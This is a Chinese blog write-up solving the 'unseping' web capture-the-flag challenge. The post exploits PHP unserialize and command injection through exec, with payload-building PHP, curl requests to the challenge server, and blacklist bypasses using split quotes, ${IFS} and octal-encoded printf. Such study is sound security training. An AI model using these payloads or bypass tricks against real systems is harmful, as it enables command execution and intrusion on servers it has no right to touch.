攻防世界-web-unseping

最新推荐文章于 2024-04-20 18:08:50 发布
最新推荐文章于 2024-04-20 18:08:50 发布
阅读量326 收藏
点赞数
分类专栏: 安全 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuh2333/article/details/134359980
版权

1. 题目描述

打开链接,如下代码

代码都贴出来了,那么只需要分析代码即可,看是否存在漏洞以及如何利用

2. 思路分析

代码很简单,外部只需要接收cft这个参数,然后将这个参数反序列化后赋值给对量的method和args参数,啊UI周内部存在执行命令的函数ping调用exec去执行外部传入的args参数,所以这里明显存在命令注入,关键是__wakeup函数中存在一个waf,waf中对传入的参数有个黑名单限制,但是,对于命令注入这种攻击手法来说,黑名单限制容易绕过,因此我们思路就很清晰了

2.1 存在命令注入,利用命令注入执行命令

2.2 尝试绕过waf的限制

3. 解题过程

3.1 我们先简单执行下pwd这个命令,证明确实存在命令注入

$str = serialize(new ease("ping", array("pwd")));
print(base64_encode($str));

我们传入的args是一个数组,这里可以搜下call_user_func_array这个函数的用法

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozOiJwd2QiO319"

然后通过curl命令访问,得到结果如下

说明pwd命令执行成功

3.2 执行ls命令,尝试绕过黑名单的限制

这里使用单双引号绕过

$str = serialize(new ease("ping", array('l""s')));
print(base64_encode($str));

同样执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsIiJzIjt9fQ=="

得到结果为:

刚好找到一个flag_1s_here,经过验证,这是一个目录,这个时候同样执行ls命令,这里flag同样使用单双引号绕过即可,但是空格可以使用${IFS}替换

$str = serialize(new ease("ping", array('l""s${IFS}fla""g_1s_here')));
print(base64_encode($str));

同样,执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyNDoibCIicyR7SUZTfWZsYSIiZ18xc19oZXJlIjt9fQ=="

可以看到包含有flag的文件了

那么接下来就是执行cat flag_1s_here/flag_831b69012c67b35f.php命令获取该文件的内容,这里关键在于/该如何绕过,这里参考网上做法,通过八进制编码绕过(比如a可以表示成\141)

这里通过python简单转了下

然后再转成shell执行命令的形式

$str = serialize(new ease("ping", array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")')));
print(base64_encode($str));

最终执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319"

得到结果为cyberpeace{443e57942c8c0bf6e2e0193b56f359a4}

4. 总结

4.1 这里没有通过burpsuite而是通过执行命令的方式来获取结果,因为我这边使用burpsuite没法正常显示,不清楚原因,有清楚的欢迎评论

4.2 这里关键在于命令注入各种各样的绕过方式,获益良多

wuh2333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界-unseping
m0_49025459的博客
12-17 2835
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
攻防世界unseping_unseping攻防世界(1),零基础入门学习网络安全
最新发布
2301_79054215的博客
04-20 994
7.call_user_func_array(X,Y):是一个调用的函数,有基本的两个参数,X是本对像中的将要被调用的函数,Y传入到这个函数里面的参数。看看反序列化对象中的method变量是否等于"ping",若等于就调用array($this, $this->method)这个函数,也就是ping()函数(因为这语句的的意思是当前类(this)中的ping()函数(对传来的参数进行解码,反序列化形成一个对象,触发__wakeup()函数,并将反序列化生成的对象的变量内容赋值给当前所在的类中的变量。
攻防世界新手练习区——unseping
weixin_65049289的博客
12-21 3587
攻防世界新手练习区——unseping
攻防世界unseping
qq_63761746的博客
03-20 844
攻防世界unseping详细解读
攻防世界】unseping (反序列化与Linux bash shell)
2302_79800344的博客
04-01 1215
【代码】【攻防世界】unseping (反序列化与Linux bash shell)
攻防世界】unseping
m0_74979597的博客
09-07 519
表示easeargs属性的值为一个数组,其中1表示数组元素的数量,i:0表示数组的索引为0,s:2:""表示数组的值为"",0表示值的长度。这里很特殊,又不是写一些特殊字符,让它错误的认为代码,或构成新代码来进行绕过,它只是一种与字符串比较进行匹配,只要没有包含。命令与文件之间有空格,怎么办,用${IFS} 这是特殊的环境变量,在Unix/linux 用来字段分割符;O:4:"ease":2: 类名为ease的对象,4表示类名的长度,2表示对象属性的数量。2.绕过简单的防火墙,用“”,‘’,
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
【愚公系列】2023年05月 攻防世界-Web(unseping)
时光隧道
05-25 9837
反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中。反序列化是将已序列化数据还原回对象的过程。攻击者可以通过构造恶意序列化数据来利用反序列化漏洞,从而在受害者的系统上执行任意代码或者进行远程攻击。攻击者可以通过修改序列化数据中的类名来指定一个恶意的类,该类将在反序列化过程中被实例化并执行其中的代码。攻击者还可以利用在对象反序列化期间执行的构造函数或readObject()方法中的任意代码执行漏洞,来进行恶意代码执行。
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 345
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 1721
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
攻防世界新手unseping
06-01
您好,欢迎来到攻防世界!作为新手,您可以通过以下几个步骤来进行学习和实践: 1. 学习基础知识:通过阅读相关书籍、网站或参加线上/线下的培训课程,了解网络安全基础知识,包括网络通信原理、操作系统、编程语言、网络协议、漏洞类型等。 2. 练习实战:通过参加CTF比赛、切尔诺贝利网络安全实验室、Hackthebox等平台,进行实战操作,练习渗透测试、漏洞挖掘等技能。 3. 加入社区:加入相关网络安全社区,与其他安全从业者进行交流、分享经验、学习新技术。 4. 持续学习:网络安全领域的技术更新非常快,需要持续学习、保持对新技术的敏感度。 希望以上建议能对您有所帮助!如果您有其他问题,欢迎继续向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值